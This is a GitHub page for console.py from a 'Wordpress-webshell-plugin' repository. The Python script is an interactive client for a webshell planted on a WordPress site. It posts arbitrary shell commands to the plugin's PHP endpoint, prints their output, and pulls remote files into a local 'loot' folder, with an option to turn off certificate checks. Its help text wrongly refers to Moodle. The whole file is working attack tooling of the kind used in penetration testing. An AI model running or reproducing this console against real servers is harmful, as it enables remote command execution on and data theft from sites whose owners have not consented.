Wordpress-webshell-plugin/console.py at master · p0dalirius/Wordpress-webshell-plugin · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : console.py
# Author             : Podalirius (@podalirius_)
# Date created       : 22 May 2022

import argparse
import os
import readline
import requests
import json

VERIFY = True

class CommandCompleter(object):
    def __init__(self):
        self.options = {
            "help": [],
            "download": [],
            "exit": []
        }

    def complete(self, text, state):
        if state == 0:
            if len(text) == 0:
                self.matches = [s for s in self.options.keys()]
            elif len(text) != 0:
                self.matches = [s for s in self.options.keys() if s and s.startswith(text)]
        try:
            return self.matches[state] + " "
        except IndexError:
            return None


readline.set_completer(CommandCompleter().complete)
readline.parse_and_bind('tab: complete')
readline.set_completer_delims('\n')


def parseArgs():
    parser = argparse.ArgumentParser(description="Interactive console for Moodle webshell plugin")
    parser.add_argument("-t", "--target", default=None, required=True, help='Moodle target instance')
    parser.add_argument("-k", "--insecure", dest="insecure_tls", action="store_true", default=False, help="Allow insecure server connections when using SSL (default: False)")
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')
    return parser.parse_args()


def remote_exec(target, cmd, verbose=False):
    try:
        r = requests.post(
            "%s/wp-content/plugins/wp_webshell/wp_webshell.php" % target,
            data={
                "action": "exec",
                "cmd": cmd,
            },
            verify=VERIFY
        )
        if r.status_code == 200:
            data = r.json()
            if verbose:
                print(json.dumps(data, indent=4))
            if len(data["stdout"].strip()) != 0:
                print(data["stdout"].strip())

            if len(data["stderr"].strip()) != 0:
                for line in data["stderr"].strip().split('\n'):
                    print("\x1b[91m%s\x1b[0m" % line)
    except Exception as e:
        print(e)


def remote_download(target, remote_path, local_path="./loot/"):
    def b_filesize(content):
        l = len(content)
        units = ['B', 'kB', 'MB', 'GB', 'TB', 'PB']
        for k in range(len(units)):
            if l < (1024 ** (k + 1)):
                break
        return "%4.2f %s" % (round(l / (1024 ** k), 2), units[k])
    #
    r = requests.post(
        "%s/wp-content/plugins/wp_webshell/wp_webshell.php" % target,
        data={
            "action": "download",
            "path": remote_path
        },
        verify=VERIFY
    )

    if r.status_code == 200:
        print('\x1b[92m[+] (%9s) %s\x1b[0m' % (b_filesize(r.content), remote_path))
        dir = local_path + os.path.dirname(remote_path)
        if not os.path.exists(dir):
            os.makedirs(dir, exist_ok=True)
        f = open(local_path + remote_path, "wb")
        f.write(r.content)
        f.close()
        return True
    else:
        print('\x1b[91m[!] (%s) %s\x1b[0m' % ("==error==", remote_path))
        return False


def show_help():
    print(" - %-15s %s " % ("download", "Downloads a file from the remote server."))
    print(" - %-15s %s " % ("help", "Displays this help message."))
    print(" - %-15s %s " % ("exit", "Exits the script."))
    return


if __name__ == '__main__':
    options = parseArgs()

    if not options.target.startswith("https://") and not options.target.startswith("http://"):
        options.target = "http://" + options.target

    if options.insecure_tls:
        # Disable warings of insecure connection for invalid certificates
        requests.packages.urllib3.disable_warnings()
        # Allow use of deprecated and weak cipher methods
        try:
            requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
        except AttributeError:
            pass
        try:
            requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
        except AttributeError:
            pass

    VERIFY = not options.insecure_tls

    running = True
    while running:
        cmd = input("[webshell]> ").strip()
        if len(cmd) == 0:
            continue
        args = cmd.lower().split(" ")

        if args[0] == "exit":
            running = False
        elif args[0] == "help":
            show_help()
        elif args[0] == "download":
            if len(args) != 2 and len(args) != 3:
                print("Usage: download <remotepath> [localpath]")
            elif len(args) == 2:
                remote_download(options.target, remote_path=args[1])
            elif len(args) == 3:
                remote_download(options.target, remote_path=args[1], local_path=args[2])
        else:
            remote_exec(options.target, cmd, verbose=options.verbose)